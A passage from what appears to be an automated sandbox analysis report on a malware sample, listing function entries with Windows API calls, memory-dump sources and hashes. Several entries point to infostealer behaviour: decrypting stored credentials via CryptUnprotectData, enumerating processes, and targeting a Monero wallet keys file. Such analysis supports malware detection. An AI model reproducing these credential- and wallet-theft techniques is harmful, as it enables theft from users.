                                • Instruction Fuzzy Hash: 43B2E2F360C204AFE7086E2DEC8567ABBE9EF94320F16493DE6C5C7744EA3558408697
                                Function 011524CE Relevance: 7.9, Strings: 5, Instructions: 1631COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ONn^$W*g7$e=am$yi{{$V}7
                                • API String ID: 0-413107333
                                • Opcode ID: 1171b7a7396845b71c266bf6dfde8909829f75a72f854418243ea70c9ec49a86
                                • Instruction ID: 5b58f7db8c1b2ae4b0ebf7dbdb4abf524f841ec82b158086fed2a3245ee7e7ad
                                • Opcode Fuzzy Hash: 1171b7a7396845b71c266bf6dfde8909829f75a72f854418243ea70c9ec49a86
                                • Instruction Fuzzy Hash: 16B219F36082009FE708AF2DEC9567ABBE9EFD4320F1A453DE6C5C7744E63558018696
                                Function 011419E4 Relevance: 7.9, Strings: 5, Instructions: 1601COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: R)|$[e_'$^n~o$aHu[$u5\
                                • API String ID: 0-1803858425
                                • Opcode ID: ae5afb6835e7f1de1c1cffb63ac6687990b40bd870b4c2cf3fce931e9ef0864a
                                • Instruction ID: 70e442f8b6309f5a2398b73ea3ec85b0e86e1b5fa682928c404b74ae18832ae0
                                • Opcode Fuzzy Hash: ae5afb6835e7f1de1c1cffb63ac6687990b40bd870b4c2cf3fce931e9ef0864a
                                • Instruction Fuzzy Hash: DAB219F360C204AFE3046E6DEC8566AFBE9EF94620F1A493DE6C4C7344E93598018697
                                Function 00D8C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D8C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D8C87C
                                • lstrcat.KERNEL32(?,00DA0B46), ref: 00D8C943
                                • lstrcat.KERNEL32(?,00DA0B47), ref: 00D8C957
                                • lstrcat.KERNEL32(?,00DA0B4E), ref: 00D8C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 4cd1a3379ebf2d69610426750a157bb07a656c37bf98aa209a64313e7b94c8ec
                                • Instruction ID: 418c77c9b8185c35a13bad937aef3fbab51b18102c34681eea8a8d77e0743d6b
                                • Opcode Fuzzy Hash: 4cd1a3379ebf2d69610426750a157bb07a656c37bf98aa209a64313e7b94c8ec
                                • Instruction Fuzzy Hash: D4415EB591421DDFDB10DFA4CD89FEEB7B8BB48704F1041A8E509A7280D7746A84DFA1
                                Function 00D87240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D8724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D87254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D87281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00D872A4
                                • LocalFree.KERNEL32(?), ref: 00D872AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: e9066396748043f7096416e1a9382062ef9ba7936fab287b8459a6e6ac1bd0e5
                                • Instruction ID: 5e9a734ff94fcbd1e609e7c0d9df7dcc97943d180b413e3193f6efd1c0958760
                                • Opcode Fuzzy Hash: e9066396748043f7096416e1a9382062ef9ba7936fab287b8459a6e6ac1bd0e5
                                • Instruction Fuzzy Hash: 7B011EB5A4020CBBEB10DFE4CD4AF9E77B8EB44B04F204155FB05AB2C0D6B0BA009B65
                                Function 00D99600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D9961E
                                • Process32First.KERNEL32(00DA0ACA,00000128), ref: 00D99632
                                • Process32Next.KERNEL32(00DA0ACA,00000128), ref: 00D99647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00D9965C
                                • CloseHandle.KERNEL32(00DA0ACA), ref: 00D9967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: c6c7dc90f65e23de587ac5fbe5266650bfd507188d3aa9b5c98398416c987c02
                                • Instruction ID: b4ecca80aaacc5ce267ac4fce49f43f489c7cbd6c793a23085110e986bb0b6d1
                                • Opcode Fuzzy Hash: c6c7dc90f65e23de587ac5fbe5266650bfd507188d3aa9b5c98398416c987c02
                                • Instruction Fuzzy Hash: 3501E975A0020CABCF14DFA5C959BEDBBF8AB48304F104188A90597280D734AA40DF61
                                Function 0115427F Relevance: 6.3, Strings: 4, Instructions: 1296COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: M)}|$TY9z$jF~$l^?w
                                • API String ID: 0-1276393754
                                • Opcode ID: 40074a63bb0efb8783f982efeea53445cc4432f9d9f77e9312294dc35f29545b
                                • Instruction ID: 1740bc45df546e2a739b7197fbd331c024f7e3ec501a5214430108e7097593af
                                • Opcode Fuzzy Hash: 40074a63bb0efb8783f982efeea53445cc4432f9d9f77e9312294dc35f29545b
                                • Instruction Fuzzy Hash: DF92C3F360C214AFE704AE2DEC8566AFBE5EF98720F16492DE6C4C3744E63598408797
                                Function 00D98680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00DA05B7), ref: 00D986CA
                                • Process32First.KERNEL32(?,00000128), ref: 00D986DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00D986F3
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • CloseHandle.KERNEL32(?), ref: 00D98761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: bfec094896900c70709378741e65054557d094ee52658d6b2c1f634c41cc7793
                                • Instruction ID: 764022ba21a6a52245eadbf506ba41a3061d3c4ce22a5a4fab885e135044c363
                                • Opcode Fuzzy Hash: bfec094896900c70709378741e65054557d094ee52658d6b2c1f634c41cc7793
                                • Instruction Fuzzy Hash: 26314872911228ABCF24EF99DD46FEEB778FF45700F104199E10AA61A0DB306A45CFB1
                                Function 00D98EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00D85184,40000001,00000000,00000000,?,00D85184), ref: 00D98EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 0195800ddeccc93b7dbd6b1385fc56172909b8b21a8b130213627e36684020e5
                                • Instruction ID: 24cf706bab8c2796f6ffcfd2a04c63fe607e648e62945607a5882980dd85b916
                                • Opcode Fuzzy Hash: 0195800ddeccc93b7dbd6b1385fc56172909b8b21a8b130213627e36684020e5
                                • Instruction Fuzzy Hash: 33111870200208BFDF04CF64D889FAB73A9AF8AB04F14A458F9198B250DB35EC41EB70
                                Function 00D89AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00D84EEE,00000000,?), ref: 00D89B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89B2A
                                • LocalFree.KERNEL32(?,?,?,?,00D84EEE,00000000,?), ref: 00D89B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 9a4632aade4f09f65a333aead1f018cccf8a24a789250f48a98a0ff34e454fad
                                • Instruction ID: 1909e625cda24993bb9210e19a94ea24ca201678d64e20f615b79539f59f4953
                                • Opcode Fuzzy Hash: 9a4632aade4f09f65a333aead1f018cccf8a24a789250f48a98a0ff34e454fad
                                • Instruction Fuzzy Hash: 1911D4B4241208AFEB00CF64CC95FAAB7B5FB89704F248048F9159B3D0C771A901DB50
                                Function 00D97980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00DA0E00,00000000,?), ref: 00D979B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D979B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00DA0E00,00000000,?), ref: 00D979C4
                                • wsprintfA.USER32 ref: 00D979F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 6693e3aad6b42ae4a0c29a68ba357d930ac1ff6631d843d2c619fbc5b17ec257
                                • Instruction ID: 486bb269b103cd2cd27824dcdcc03dc5bd5596308b204327fb14cdefef46bd1d
                                • Opcode Fuzzy Hash: 6693e3aad6b42ae4a0c29a68ba357d930ac1ff6631d843d2c619fbc5b17ec257
                                • Instruction Fuzzy Hash: 8C1118B2904118ABCB149FD9DE45FBEB7F8EB48B15F10411AF645A2280D2395940D7B1
                                Function 00D97A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0182DFE8,00000000,?,00DA0E10,00000000,?,00000000,00000000), ref: 00D97A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D97A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0182DFE8,00000000,?,00DA0E10,00000000,?,00000000,00000000,?), ref: 00D97A7D
                                • wsprintfA.USER32 ref: 00D97AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
